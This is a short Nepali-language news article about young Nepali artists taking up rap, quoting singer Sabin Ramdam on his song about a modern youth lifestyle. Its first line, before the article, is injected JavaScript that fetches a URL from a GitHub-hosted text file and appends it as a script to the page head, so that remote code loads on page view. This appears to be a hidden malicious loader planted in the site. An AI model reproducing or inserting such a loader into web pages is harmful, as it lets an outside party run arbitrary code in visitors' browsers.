;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ १७, काठमाडौ । नेपालमा बिगतका केही समय देखि पश्चिमा सैलिका गायन प्रतिभाहरु जन्मिने क्रम व्यापक रुपमा भइरहेको पाइएको छ। अङ्रेजी गायन क्षेत्रमा चर्चित गायन शैली जसलाई Rap भन्ने गरिन्छ पछिल्लो समयमा नेपाली युवा पुस्ताले मनपराएका छन र यसै पद्दतिलाइ नेपाली सङ्गीत जगतमा लिएर आइरहेका छन।
मुख्यत यस्तो गायन प्रबृत्तिले कुनै न कुनै विषयलाई जोड दिएको हुन्छ वा कुनै घटनालाइ दर्शाएको हुन्छ। सबिन रामदामको यश गीतमा एउटा युवाको आधुनिक जिवनशैली चित्रण गरिएको पाइएको छ।
म र म जस्तो युवाले गायन क्षेत्रमा नया आयाम ल्याउन जरूरी भएकोले मैले यस तरिकाको गायन शैली रोजेको छु भनी उनले बताए।
तथापी लोकभाका, आधुनिक तथा पुराना गायन शैली र गायकहरुलाइ सधै सम्मान र इज्जत रहेको रामदामले बताए।
फेसबुक प्रतिक्रियाहरु